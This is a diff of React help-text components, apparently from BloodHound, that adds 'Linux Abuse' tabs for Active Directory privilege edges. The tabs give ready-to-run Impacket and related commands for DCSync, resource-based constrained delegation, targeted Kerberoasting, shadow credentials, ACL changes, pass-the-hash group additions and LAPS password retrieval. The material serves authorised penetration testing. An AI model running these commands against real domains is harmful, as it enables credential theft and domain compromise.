@@ -177,12 +177,9 @@ const LinuxAbuse = ({
 
                         <h4> Resource-Based Constrained Delegation </h4>
 
-                        <p>
-                            First, if an attacker does not control an account with an
-                            SPN set, a new attacker-controlled computer account can be
-                            added with Impacket's addcomputer.py example script:
-                        </p>
-
+                        First, if an attacker does not control an account with an
+                        SPN set, a new attacker-controlled computer account can be
+                        added with Impacket's addcomputer.py example script:
                         <pre>
                             <code>
                                 {
@@ -190,13 +187,19 @@ const LinuxAbuse = ({
                                 }
                             </code>
                         </pre>
-
-                        <p>
-                            We can then get a service ticket for the service name (sname) we
-                            want to "pretend" to be "admin" for. Impacket's getST.py example script
-                            can be used for that purpose.
-                        </p>
-
+                        We now need to configure the target object so that the attacker-controlled
+                        computer can delegate to it. Impacket's rbcd.py script can be used for that
+                        purpose:
+                        <pre>
+                            <code>
+                                {
+                                    "rbcd.py -delegate-from 'ATTACKERSYSTEM$' -delegate-to 'TargetComputer' -action 'write' 'domain/user:password'"
+                                }
+                            </code>
+                        </pre>
+                        And finally we can get a service ticket for the service name (sname) we
+                        want to "pretend" to be "admin" for. Impacket's getST.py example script
+                        can be used for that purpose.
                         <pre>
                             <code>
                                 {
@@ -204,11 +207,8 @@ const LinuxAbuse = ({
                                 }
                             </code>
                         </pre>
-
-                        <p>
-                            This ticket can then be used with Pass-the-Ticket, and could grant access
-                            to the file system of the TARGETCOMPUTER.
-                        </p>
+                        This ticket can then be used with Pass-the-Ticket, and could grant access
+                        to the file system of the TARGETCOMPUTER.
 
                         <h4> Shadow Credentials attack </h4>
 
@@ -228,12 +228,9 @@ const LinuxAbuse = ({
                     <>
                         <h4> Resource-Based Constrained Delegation </h4>
 
-                        <p>
-                            First, if an attacker does not control an account with an
-                            SPN set, a new attacker-controlled computer account can be
-                            added with Impacket's addcomputer.py example script:
-                        </p>
-
+                        First, if an attacker does not control an account with an
+                        SPN set, a new attacker-controlled computer account can be
+                        added with Impacket's addcomputer.py example script:
                         <pre>
                             <code>
                                 {
@@ -241,13 +238,19 @@ const LinuxAbuse = ({
                                 }
                             </code>
                         </pre>
-
-                        <p>
-                            We can then get a service ticket for the service name (sname) we
-                            want to "pretend" to be "admin" for. Impacket's getST.py example script
-                            can be used for that purpose.
-                        </p>
-
+                        We now need to configure the target object so that the attacker-controlled
+                        computer can delegate to it. Impacket's rbcd.py script can be used for that
+                        purpose:
+                        <pre>
+                            <code>
+                                {
+                                    "rbcd.py -delegate-from 'ATTACKERSYSTEM$' -delegate-to 'TargetComputer' -action 'write' 'domain/user:password'"
+                                }
+                            </code>
+                        </pre>
+                        And finally we can get a service ticket for the service name (sname) we
+                        want to "pretend" to be "admin" for. Impacket's getST.py example script
+                        can be used for that purpose.
                         <pre>
                             <code>
                                 {
@@ -255,11 +258,8 @@ const LinuxAbuse = ({
                                 }
                             </code>
                         </pre>
-
-                        <p>
-                            This ticket can then be used with Pass-the-Ticket, and could grant access
-                            to the file system of the TARGETCOMPUTER.
-                        </p>
+                        This ticket can then be used with Pass-the-Ticket, and could grant access
+                        to the file system of the TARGETCOMPUTER.
 
                         <h4> Shadow Credentials attack </h4>
 

--- a/src/components/Modals/HelpTexts/GenericAll/References.jsx
+++ b/src/components/Modals/HelpTexts/GenericAll/References.jsx
@@ -46,6 +46,38 @@ const References = () => {
             <a href='https://github.com/Kevin-Robertson/Powermad#new-machineaccount'>
                 https://github.com/Kevin-Robertson/Powermad#new-machineaccount
             </a>
+            <br />
+            <a href='https://www.thehacker.recipes/ad/movement/dacl/addmember'>
+                https://www.thehacker.recipes/ad/movement/dacl/addmember
+            </a>
+            <br />
+            <a href='https://www.thehacker.recipes/ad/movement/dacl/targeted-kerberoasting'>
+                https://www.thehacker.recipes/ad/movement/dacl/targeted-kerberoasting
+            </a>
+            <br />
+            <a href='https://www.thehacker.recipes/ad/movement/group-policies'>
+                https://www.thehacker.recipes/ad/movement/group-policies
+            </a>
+            <br />
+            <a href='https://www.thehacker.recipes/ad/movement/dacl/forcechangepassword'>
+                https://www.thehacker.recipes/ad/movement/dacl/forcechangepassword
+            </a>
+            <br />
+            <a href='https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials'>
+                https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials
+            </a>
+            <br />
+            <a href='https://www.thehacker.recipes/ad/movement/credentials/dumping/dcsync'>
+                https://www.thehacker.recipes/ad/movement/credentials/dumping/dcsync
+            </a>
+            <br />
+            <a href='https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd'>
+                https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd
+            </a>
+            <br />
+            <a href='https://www.thehacker.recipes/ad/movement/dacl/grant-rights'>
+                https://www.thehacker.recipes/ad/movement/dacl/grant-rights
+            </a>
         </>
     );
 };

--- a/src/components/Modals/HelpTexts/GenericAll/WindowsAbuse.jsx
+++ b/src/components/Modals/HelpTexts/GenericAll/WindowsAbuse.jsx
@@ -1,7 +1,7 @@
 import React from 'react';
 import PropTypes from 'prop-types';
 
-const Abuse = ({
+const WindowsAbuse = ({
     sourceName,
     sourceType,
     targetName,
@@ -592,7 +592,7 @@ const Abuse = ({
     return <></>;
 };
 
-Abuse.propTypes = {
+WindowsAbuse.propTypes = {
     sourceName: PropTypes.string,
     sourceType: PropTypes.string,
     targetName: PropTypes.string,
@@ -600,4 +600,4 @@ Abuse.propTypes = {
     targetId: PropTypes.string,
     haslaps: PropTypes.bool,
 };
-export default Abuse;
+export default WindowsAbuse;

--- a/src/components/Modals/HelpTexts/GenericWrite/GenericWrite.jsx
+++ b/src/components/Modals/HelpTexts/GenericWrite/GenericWrite.jsx
@@ -2,7 +2,8 @@ import React from 'react';
 import PropTypes from 'prop-types';
 import { Tabs, Tab } from 'react-bootstrap';
 import General from './General';
-import Abuse from './Abuse';
+import WindowsAbuse from './WindowsAbuse';
+import LinuxAbuse from './LinuxAbuse';
 import Opsec from './Opsec';
 import References from './References';
 
@@ -17,17 +18,24 @@ const GenericWrite = ({ sourceName, sourceType, targetName, targetType }) => {
                     targetType={targetType}
                 />
             </Tab>
-            <Tab eventKey={2} title='Abuse Info'>
-                <Abuse
+            <Tab eventKey={2} title='Windows Abuse'>
+                <WindowsAbuse
                     sourceName={sourceName}
                     sourceType={sourceType}
                     targetType={targetType}
                 />
             </Tab>
-            <Tab eventKey={3} title='Opsec Considerations'>
+            <Tab eventKey={3} title='Linux Abuse'>
+                <LinuxAbuse
+                    sourceName={sourceName}
+                    sourceType={sourceType}
+                    targetType={targetType}
+                />
+            </Tab>
+            <Tab eventKey={4} title='Opsec'>
                 <Opsec />
             </Tab>
-            <Tab eventKey={4} title='References'>
+            <Tab eventKey={5} title='Refs'>
                 <References />
             </Tab>
         </Tabs>

--- a/src/components/Modals/HelpTexts/GenericWrite/LinuxAbuse.jsx
+++ b/src/components/Modals/HelpTexts/GenericWrite/LinuxAbuse.jsx
@@ -1,0 +1,177 @@
+import React from 'react';
+import PropTypes from 'prop-types';
+
+const LinuxAbuse = ({ sourceName, sourceType, targetType }) => {
+    switch (targetType) {
+        case 'Group':
+            return (
+                <>
+                    <p>
+                        GenericWrite to a group allows you to directly modify
+                        group membership of the group.
+                    </p>
+
+                    <p>
+                        Use samba's net tool to add the user to the target group. The credentials can be supplied in cleartext
+                        or prompted interactively if omitted from the command line:
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                'net rpc group addmem "TargetGroup" "TargetUser" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"'
+                            }
+                        </code>
+                    </pre>
+
+                    <p>
+                        Pass-the-hash can also be done here with <a href='https://github.com/byt3bl33d3r/pth-toolkit'>pth-toolkit's net tool</a>.
+                        If the LM hash is not known it must be replace with <code>ffffffffffffffffffffffffffffffff</code>.
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                'pth-net rpc group addmem "TargetGroup" "TargetUser" -U "DOMAIN"/"ControlledUser"%"LMhash":"NThash" -S "DomainController"'
+                            }
+                        </code>
+                    </pre>
+
+                    <p>
+                        Finally, verify that the user was successfully added to the group:
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                'net rpc group members "TargetGroup" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"'
+                            }
+                        </code>
+                    </pre>
+                </>
+            );
+        case 'User':
+            return (
+                <>
+                    <h4> Targeted Kerberoast </h4>
+
+                    <p>
+                        A targeted kerberoast attack can be performed using{' '}
+                        <a href='https://github.com/ShutdownRepo/targetedKerberoast'>targetedKerberoast.py</a>.
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                "targetedKerberoast.py -v -d 'domain.local' -u 'controlledUser' -p 'ItsPassword'"
+                            }
+                        </code>
+                    </pre>
+
+                    <p>
+                        The tool will automatically attempt a targetedKerberoast
+                        attack, either on all users or against a specific one if
+                        specified in the command line, and then obtain a crackable hash.
+                        The cleanup is done automatically as well.
+                    </p>
+
+                    <p>
+                        The recovered hash can be cracked offline using the tool
+                        of your choice.
+                    </p>
+
+                    <h4> Shadow Credentials attack </h4>
+
+                    <p>To abuse this privilege, use <a href='https://github.com/ShutdownRepo/pywhisker'>pyWhisker</a>.</p>
+
+                    <pre>
+                        <code>{'pywhisker.py -d "domain.local" -u "controlledAccount" -p "somepassword" --target "targetAccount" --action "add"'}</code>
+                    </pre>
+
+                    <p>
+                        For other optional parameters, view the pyWhisker documentation.
+                    </p>
+                </>
+            );
+        case 'Computer':
+            return (
+                <>
+                    <h4> Resource-Based Constrained Delegation </h4>
+
+                    <p>
+                        First, if an attacker does not control an account with an
+                        SPN set, a new attacker-controlled computer account can be
+                        added with Impacket's addcomputer.py example script:
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                "addcomputer.py -method LDAPS -computer-name 'ATTACKERSYSTEM$' -computer-pass 'Summer2018!' -dc-host $DomainController -domain-netbios $DOMAIN 'domain/user:password'"
+                            }
+                        </code>
+                    </pre>
+
+                    <p>
+                        We can then get a service ticket for the service name (sname) we
+                        want to "pretend" to be "admin" for. Impacket's getST.py example script
+                        can be used for that purpose.
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                "getST.py -spn 'cifs/targetcomputer.testlab.local' -impersonate 'admin' 'domain/attackersystem$:Summer2018!'"
+                            }
+                        </code>
+                    </pre>
+
+                    <p>
+                        This ticket can then be used with Pass-the-Ticket, and could grant access
+                        to the file system of the TARGETCOMPUTER.
+                    </p>
+
+                    <h4> Shadow Credentials attack </h4>
+
+                    <p>To abuse this privilege, use <a href='https://github.com/ShutdownRepo/pywhisker'>pyWhisker</a>.</p>
+
+                    <pre>
+                        <code>{'pywhisker.py -d "domain.local" -u "controlledAccount" -p "somepassword" --target "targetAccount" --action "add"'}</code>
+                    </pre>
+
+                    <p>
+                        For other optional parameters, view the pyWhisker documentation.
+                    </p>
+                </>
+            );
+        case 'GPO':
+            return (
+                <>
+                    <p>
+                        With GenericWrite over a GPO, you may make modifications
+                        to that GPO which will then apply to the users and
+                        computers affected by the GPO. Select the target object
+                        you wish to push an evil policy down to, then use the
+                        gpedit GUI to modify the GPO, using an evil policy that
+                        allows item-level targeting, such as a new immediate
+                        scheduled task. Then wait at least 2 hours for the group
+                        policy client to pick up and execute the new evil
+                        policy. See the references tab for a more detailed write
+                        up on this abuse`;
+                    </p>
+
+                    <p>
+                        <a href="https://github.com/Hackndo/pyGPOAbuse">pyGPOAbuse.py</a> can be used for that purpose.
+                    </p>
+                </>
+            );
+    }
+};
+
+LinuxAbuse.propTypes = {
+    sourceName: PropTypes.string,
+    sourceType: PropTypes.string,
+    targetType: PropTypes.string,
+};
+
+export default LinuxAbuse;

--- a/src/components/Modals/HelpTexts/GenericWrite/LinuxAbuse.jsx
+++ b/src/components/Modals/HelpTexts/GenericWrite/LinuxAbuse.jsx
@@ -98,12 +98,9 @@ const LinuxAbuse = ({ sourceName, sourceType, targetType }) => {
                 <>
                     <h4> Resource-Based Constrained Delegation </h4>
 
-                    <p>
-                        First, if an attacker does not control an account with an
-                        SPN set, a new attacker-controlled computer account can be
-                        added with Impacket's addcomputer.py example script:
-                    </p>
-
+                    First, if an attacker does not control an account with an
+                    SPN set, a new attacker-controlled computer account can be
+                    added with Impacket's addcomputer.py example script:
                     <pre>
                         <code>
                             {
@@ -111,13 +108,19 @@ const LinuxAbuse = ({ sourceName, sourceType, targetType }) => {
                             }
                         </code>
                     </pre>
-
-                    <p>
-                        We can then get a service ticket for the service name (sname) we
-                        want to "pretend" to be "admin" for. Impacket's getST.py example script
-                        can be used for that purpose.
-                    </p>
-
+                    We now need to configure the target object so that the attacker-controlled
+                    computer can delegate to it. Impacket's rbcd.py script can be used for that
+                    purpose:
+                    <pre>
+                        <code>
+                            {
+                                "rbcd.py -delegate-from 'ATTACKERSYSTEM$' -delegate-to 'TargetComputer' -action 'write' 'domain/user:password'"
+                            }
+                        </code>
+                    </pre>
+                    And finally we can get a service ticket for the service name (sname) we
+                    want to "pretend" to be "admin" for. Impacket's getST.py example script
+                    can be used for that purpose.
                     <pre>
                         <code>
                             {
@@ -125,11 +128,8 @@ const LinuxAbuse = ({ sourceName, sourceType, targetType }) => {
                             }
                         </code>
                     </pre>
-
-                    <p>
-                        This ticket can then be used with Pass-the-Ticket, and could grant access
-                        to the file system of the TARGETCOMPUTER.
-                    </p>
+                    This ticket can then be used with Pass-the-Ticket, and could grant access
+                    to the file system of the TARGETCOMPUTER.
 
                     <h4> Shadow Credentials attack </h4>
 

--- a/src/components/Modals/HelpTexts/GenericWrite/WindowsAbuse.jsx
+++ b/src/components/Modals/HelpTexts/GenericWrite/WindowsAbuse.jsx
@@ -1,7 +1,7 @@
 import React from 'react';
 import PropTypes from 'prop-types';
 
-const Abuse = ({ sourceName, sourceType, targetType }) => {
+const WindowsAbuse = ({ sourceName, sourceType, targetType }) => {
     switch (targetType) {
         case 'Group':
             return (
@@ -213,10 +213,10 @@ const Abuse = ({ sourceName, sourceType, targetType }) => {
     }
 };
 
-Abuse.propTypes = {
+WindowsAbuse.propTypes = {
     sourceName: PropTypes.string,
     sourceType: PropTypes.string,
     targetType: PropTypes.string,
 };
 
-export default Abuse;
+export default WindowsAbuse;

--- a/src/components/Modals/HelpTexts/GetChanges/GetChanges.jsx
+++ b/src/components/Modals/HelpTexts/GetChanges/GetChanges.jsx
@@ -2,7 +2,8 @@ import React from 'react';
 import PropTypes from 'prop-types';
 import { Tabs, Tab } from 'react-bootstrap';
 import General from './General';
-import Abuse from './Abuse';
+import WindowsAbuse from './WindowsAbuse';
+import LinuxAbuse from './LinuxAbuse';
 import Opsec from './Opsec';
 import References from './References';
 
@@ -16,13 +17,16 @@ const GetChanges = ({ sourceName, sourceType, targetName, targetType }) => {
                     targetName={targetName}
                 />
             </Tab>
-            <Tab eventKey={2} title='Abuse Info'>
-                <Abuse />
+            <Tab eventKey={2} title='Windows Abuse'>
+                <WindowsAbuse />
             </Tab>
-            <Tab eventKey={3} title='Opsec Considerations'>
+            <Tab eventKey={3} title='Linux Abuse'>
+                <LinuxAbuse />
+            </Tab>
+            <Tab eventKey={4} title='Opsec'>
                 <Opsec />
             </Tab>
-            <Tab eventKey={4} title='References'>
+            <Tab eventKey={5} title='Refs'>
                 <References />
             </Tab>
         </Tabs>

--- a/src/components/Modals/HelpTexts/GetChanges/LinuxAbuse.jsx
+++ b/src/components/Modals/HelpTexts/GetChanges/LinuxAbuse.jsx
@@ -11,7 +11,7 @@ const LinuxAbuse = () => {
             <pre>
                 <code>
                     {
-                        "secretsdump 'testlab.local'/'Administrator':'Password'@'DOMAINCONTROLLER'"
+                        "secretsdump.py 'testlab.local'/'Administrator':'Password'@'DOMAINCONTROLLER'"
                     }
                 </code>
             </pre>

--- a/src/components/Modals/HelpTexts/GetChanges/LinuxAbuse.jsx
+++ b/src/components/Modals/HelpTexts/GetChanges/LinuxAbuse.jsx
@@ -1,20 +1,21 @@
 import React from 'react';
 
-const Abuse = () => {
+const LinuxAbuse = () => {
     return (
         <>
             <p>
-                With both GetChanges and GetChangesAll privileges in BloodHound,
-                you may perform a dcsync attack to get the password hash of an
-                arbitrary principal using mimikatz:
+                You may perform a dcsync attack to get the password hash of an
+                arbitrary principal using impacket's secretsdump.py example script:
             </p>
+
             <pre>
                 <code>
                     {
-                        'lsadump::dcsync /domain:testlab.local /user:Administrator'
+                        "secretsdump 'testlab.local'/'Administrator':'Password'@'DOMAINCONTROLLER'"
                     }
                 </code>
             </pre>
+
             <p>
                 You can also perform the more complicated ExtraSids attack to
                 hop domain trusts. For information on this see the blog post by
@@ -24,4 +25,4 @@ const Abuse = () => {
     );
 };
 
-export default Abuse;
+export default LinuxAbuse;

--- a/src/components/Modals/HelpTexts/GetChanges/References.jsx
+++ b/src/components/Modals/HelpTexts/GetChanges/References.jsx
@@ -10,6 +10,10 @@ const References = () => {
             <a href='https://blog.harmj0y.net/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/'>
                 https://blog.harmj0y.net/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
             </a>
+            <br />
+            <a href='https://www.thehacker.recipes/ad/movement/credentials/dumping/dcsync'>
+                https://www.thehacker.recipes/ad/movement/credentials/dumping/dcsync
+            </a>
         </>
     );
 };

--- a/src/components/Modals/HelpTexts/GetChanges/WindowsAbuse.jsx
+++ b/src/components/Modals/HelpTexts/GetChanges/WindowsAbuse.jsx
@@ -1,0 +1,27 @@
+import React from 'react';
+
+const WindowsAbuse = () => {
+    return (
+        <>
+            <p>
+                With both GetChanges and GetChangesAll privileges in BloodHound,
+                you may perform a dcsync attack to get the password hash of an
+                arbitrary principal using mimikatz:
+            </p>
+            <pre>
+                <code>
+                    {
+                        'lsadump::dcsync /domain:testlab.local /user:Administrator'
+                    }
+                </code>
+            </pre>
+            <p>
+                You can also perform the more complicated ExtraSids attack to
+                hop domain trusts. For information on this see the blog post by
+                harmj0y in the references tab.
+            </p>
+        </>
+    );
+};
+
+export default WindowsAbuse;

--- a/src/components/Modals/HelpTexts/GetChangesAll/GetChangesAll.jsx
+++ b/src/components/Modals/HelpTexts/GetChangesAll/GetChangesAll.jsx
@@ -2,7 +2,8 @@ import React from 'react';
 import PropTypes from 'prop-types';
 import { Tabs, Tab } from 'react-bootstrap';
 import General from './General';
-import Abuse from './Abuse';
+import WindowsAbuse from './WindowsAbuse';
+import LinuxAbuse from './LinuxAbuse';
 import Opsec from './Opsec';
 import References from './References';
 
@@ -16,13 +17,16 @@ const GetChangesAll = ({ sourceName, sourceType, targetName, targetType }) => {
                     targetName={targetName}
                 />
             </Tab>
-            <Tab eventKey={2} title='Abuse Info'>
-                <Abuse />
+            <Tab eventKey={2} title='Windows Abuse'>
+                <WindowsAbuse />
             </Tab>
-            <Tab eventKey={3} title='Opsec Considerations'>
+            <Tab eventKey={3} title='Linux Abuse'>
+                <LinuxAbuse />
+            </Tab>
+            <Tab eventKey={4} title='Opsec'>
                 <Opsec />
             </Tab>
-            <Tab eventKey={4} title='References'>
+            <Tab eventKey={5} title='Refs'>
                 <References />
             </Tab>
         </Tabs>

--- a/src/components/Modals/HelpTexts/GetChangesAll/LinuxAbuse.jsx
+++ b/src/components/Modals/HelpTexts/GetChangesAll/LinuxAbuse.jsx
@@ -11,7 +11,7 @@ const LinuxAbuse = () => {
             <pre>
                 <code>
                     {
-                        "secretsdump 'testlab.local'/'Administrator':'Password'@'DOMAINCONTROLLER'"
+                        "secretsdump.py 'testlab.local'/'Administrator':'Password'@'DOMAINCONTROLLER'"
                     }
                 </code>
             </pre>

--- a/src/components/Modals/HelpTexts/GetChangesAll/LinuxAbuse.jsx
+++ b/src/components/Modals/HelpTexts/GetChangesAll/LinuxAbuse.jsx
@@ -1,0 +1,28 @@
+import React from 'react';
+
+const LinuxAbuse = () => {
+    return (
+        <>
+            <p>
+                You may perform a dcsync attack to get the password hash of an
+                arbitrary principal using impacket's secretsdump.py example script:
+            </p>
+
+            <pre>
+                <code>
+                    {
+                        "secretsdump 'testlab.local'/'Administrator':'Password'@'DOMAINCONTROLLER'"
+                    }
+                </code>
+            </pre>
+
+            <p>
+                You can also perform the more complicated ExtraSids attack to
+                hop domain trusts. For information on this see the blog post by
+                harmj0y in the references tab.
+            </p>
+        </>
+    );
+};
+
+export default LinuxAbuse;

--- a/src/components/Modals/HelpTexts/GetChangesAll/References.jsx
+++ b/src/components/Modals/HelpTexts/GetChangesAll/References.jsx
@@ -10,6 +10,10 @@ const References = () => {
             <a href='https://blog.harmj0y.net/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/'>
                 https://blog.harmj0y.net/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
             </a>
+            <br />
+            <a href='https://www.thehacker.recipes/ad/movement/credentials/dumping/dcsync'>
+                https://www.thehacker.recipes/ad/movement/credentials/dumping/dcsync
+            </a>
         </>
     );
 };

--- a/src/components/Modals/HelpTexts/GetChangesAll/WindowsAbuse.jsx
+++ b/src/components/Modals/HelpTexts/GetChangesAll/WindowsAbuse.jsx
@@ -1,6 +1,6 @@
 import React from 'react';
 
-const Abuse = () => {
+const WindowsAbuse = () => {
     return (
         <>
             <p>
@@ -17,11 +17,11 @@ const Abuse = () => {
             </pre>
             <p>
                 You can also perform the more complicated ExtraSids attack to
-                hop domain trusts. For information on this see the blod post by
+                hop domain trusts. For information on this see the blog post by
                 harmj0y in the references tab.
             </p>
         </>
     );
 };
 
-export default Abuse;
+export default WindowsAbuse;

--- a/src/components/Modals/HelpTexts/Owns/LinuxAbuse.jsx
+++ b/src/components/Modals/HelpTexts/Owns/LinuxAbuse.jsx
@@ -251,12 +251,9 @@ const LinuxAbuse = ({
 
                         <h4> Resource-Based Constrained Delegation </h4>
 
-                        <p>
-                            First, if an attacker does not control an account with an
-                            SPN set, a new attacker-controlled computer account can be
-                            added with Impacket's addcomputer.py example script:
-                        </p>
-
+                        First, if an attacker does not control an account with an
+                        SPN set, a new attacker-controlled computer account can be
+                        added with Impacket's addcomputer.py example script:
                         <pre>
                             <code>
                                 {
@@ -264,13 +261,19 @@ const LinuxAbuse = ({
                                 }
                             </code>
                         </pre>
-
-                        <p>
-                            We can then get a service ticket for the service name (sname) we
-                            want to "pretend" to be "admin" for. Impacket's getST.py example script
-                            can be used for that purpose.
-                        </p>
-
+                        We now need to configure the target object so that the attacker-controlled
+                        computer can delegate to it. Impacket's rbcd.py script can be used for that
+                        purpose:
+                        <pre>
+                            <code>
+                                {
+                                    "rbcd.py -delegate-from 'ATTACKERSYSTEM$' -delegate-to 'TargetComputer' -action 'write' 'domain/user:password'"
+                                }
+                            </code>
+                        </pre>
+                        And finally we can get a service ticket for the service name (sname) we
+                        want to "pretend" to be "admin" for. Impacket's getST.py example script
+                        can be used for that purpose.
                         <pre>
                             <code>
                                 {
@@ -278,11 +281,8 @@ const LinuxAbuse = ({
                                 }
                             </code>
                         </pre>
-
-                        <p>
-                            This ticket can then be used with Pass-the-Ticket, and could grant access
-                            to the file system of the TARGETCOMPUTER.
-                        </p>
+                        This ticket can then be used with Pass-the-Ticket, and could grant access
+                        to the file system of the TARGETCOMPUTER.
 
                         <h4> Shadow Credentials attack </h4>
 
@@ -324,12 +324,9 @@ const LinuxAbuse = ({
 
                         <h4> Resource-Based Constrained Delegation </h4>
 
-                        <p>
-                            First, if an attacker does not control an account with an
-                            SPN set, a new attacker-controlled computer account can be
-                            added with Impacket's addcomputer.py example script:
-                        </p>
-
+                        First, if an attacker does not control an account with an
+                        SPN set, a new attacker-controlled computer account can be
+                        added with Impacket's addcomputer.py example script:
                         <pre>
                             <code>
                                 {
@@ -337,13 +334,19 @@ const LinuxAbuse = ({
                                 }
                             </code>
                         </pre>
-
-                        <p>
-                            We can then get a service ticket for the service name (sname) we
-                            want to "pretend" to be "admin" for. Impacket's getST.py example script
-                            can be used for that purpose.
-                        </p>
-
+                        We now need to configure the target object so that the attacker-controlled
+                        computer can delegate to it. Impacket's rbcd.py script can be used for that
+                        purpose:
+                        <pre>
+                            <code>
+                                {
+                                    "rbcd.py -delegate-from 'ATTACKERSYSTEM$' -delegate-to 'TargetComputer' -action 'write' 'domain/user:password'"
+                                }
+                            </code>
+                        </pre>
+                        And finally we can get a service ticket for the service name (sname) we
+                        want to "pretend" to be "admin" for. Impacket's getST.py example script
+                        can be used for that purpose.
                         <pre>
                             <code>
                                 {
@@ -351,11 +354,8 @@ const LinuxAbuse = ({
                                 }
                             </code>
                         </pre>
-
-                        <p>
-                            This ticket can then be used with Pass-the-Ticket, and could grant access
-                            to the file system of the TARGETCOMPUTER.
-                        </p>
+                        This ticket can then be used with Pass-the-Ticket, and could grant access
+                        to the file system of the TARGETCOMPUTER.
 
                         <h4> Shadow Credentials attack </h4>
 

--- a/src/components/Modals/HelpTexts/Owns/LinuxAbuse.jsx
+++ b/src/components/Modals/HelpTexts/Owns/LinuxAbuse.jsx
@@ -237,14 +237,14 @@ const LinuxAbuse = ({
                         </p>
 
                         <p>
-                            <a href='https://github.com/n00py/LAPSDumper'>LAPSDumper</a> can be used
+                            <a href='https://github.com/p0dalirius/pyLAPS'>pyLAPS</a> can be used
                              to retrieve LAPS passwords:
                         </p>
 
                         <pre>
                             <code>
                                 {
-                                    'laps.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
+                                    'pyLAPS.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
                                 }
                             </code>
                         </pre>
@@ -428,14 +428,14 @@ const LinuxAbuse = ({
                     </p>
 
                     <p>
-                        <a href="https://github.com/n00py/LAPSDumper">LAPSDumper</a> can be used
+                        <a href="https://github.com/p0dalirius/pyLAPS">pyLAPS</a> can be used
                          for that purpose:
                     </p>
 
                     <pre>
                         <code>
                             {
-                                'laps.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
+                                'pyLAPS.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
                             }
                         </code>
                     </pre>

--- a/src/components/Modals/HelpTexts/Owns/LinuxAbuse.jsx
+++ b/src/components/Modals/HelpTexts/Owns/LinuxAbuse.jsx
@@ -1,0 +1,583 @@
+import React from 'react';
+import PropTypes from 'prop-types';
+
+const LinuxAbuse = ({
+    sourceName,
+    sourceType,
+    targetName,
+    targetType,
+    targetId,
+    haslaps,
+}) => {
+    switch (targetType) {
+        case 'Group':
+            return (
+                <>
+                    <h4> Modifying the rights </h4>
+
+                    <p>
+                        To abuse ownership of a group object, you may grant
+                        yourself the AddMember privilege.
+                    </p>
+
+                    <p>
+                        Impacket's dacledit can be used for that purpose (cf.
+                        "grant rights" reference for the link).
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                "dacledit.py -action 'write' -rights 'WriteMembers' -principal 'controlledUser' -target-dn 'groupDistinguidedName' 'domain'/'controlledUser':'password'"
+                            }
+                        </code>
+                    </pre>
+
+                    <h4> Adding to the group </h4>
+
+                    <p>
+                        You can now add members to the group.
+                    </p>
+
+                    <p>
+                        Use samba's net tool to add the user to the target group. The credentials can be supplied in cleartext
+                        or prompted interactively if omitted from the command line:
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                'net rpc group addmem "TargetGroup" "TargetUser" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"'
+                            }
+                        </code>
+                    </pre>
+
+                    <p>
+                        Pass-the-hash can also be done here with <a href='https://github.com/byt3bl33d3r/pth-toolkit'>pth-toolkit's net tool</a>.
+                        If the LM hash is not known it must be replace with <code>ffffffffffffffffffffffffffffffff</code>.
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                'pth-net rpc group addmem "TargetGroup" "TargetUser" -U "DOMAIN"/"ControlledUser"%"LMhash":"NThash" -S "DomainController"'
+                            }
+                        </code>
+                    </pre>
+
+                    <p>
+                        Finally, verify that the user was successfully added to the group:
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                'net rpc group members "TargetGroup" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"'
+                            }
+                        </code>
+                    </pre>
+
+                    <h4> Cleanup </h4>
+
+                    <p>
+                        Impacket's dacledit can be used for that purpose (cf.
+                        "grant rights" reference for the link).
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                "dacledit.py -action 'remove' -rights 'WriteMembers' -principal 'controlledUser' -target-dn 'groupDistinguidedName' 'domain'/'controlledUser':'password'"
+                            }
+                        </code>
+                    </pre>
+                </>
+            );
+
+        case 'User':
+            return (
+                <>
+                    <p>
+                        To abuse ownership of a user object, you may grant
+                        yourself the GenericAll privilege.
+                    </p>
+
+                    <p>
+                        Impacket's dacledit can be used for that purpose (cf.
+                        "grant rights" reference for the link).
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                "dacledit.py -action 'write' -rights 'FullControl' -principal 'controlledUser' -target 'targetUser' 'domain'/'controlledUser':'password'"
+                            }
+                        </code>
+                    </pre>
+
+                    <p>
+                        Cleanup of the added ACL can be performed later on with the same tool:
+                    </p>
+
+                    <h4> Targeted Kerberoast </h4>
+
+                    <p>
+                        A targeted kerberoast attack can be performed using{' '}
+                        <a href='https://github.com/ShutdownRepo/targetedKerberoast'>targetedKerberoast.py</a>.
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                "targetedKerberoast.py -v -d 'domain.local' -u 'controlledUser' -p 'ItsPassword'"
+                            }
+                        </code>
+                    </pre>
+
+                    <p>
+                        The tool will automatically attempt a targetedKerberoast
+                        attack, either on all users or against a specific one if
+                        specified in the command line, and then obtain a crackable hash.
+                        The cleanup is done automatically as well.
+                    </p>
+
+                    <p>
+                        The recovered hash can be cracked offline using the tool
+                        of your choice.
+                    </p>
+
+                    <h4> Force Change Password </h4>
+
+                    <p>
+                        Use samba's net tool to change the user's password. The credentials can be supplied in cleartext
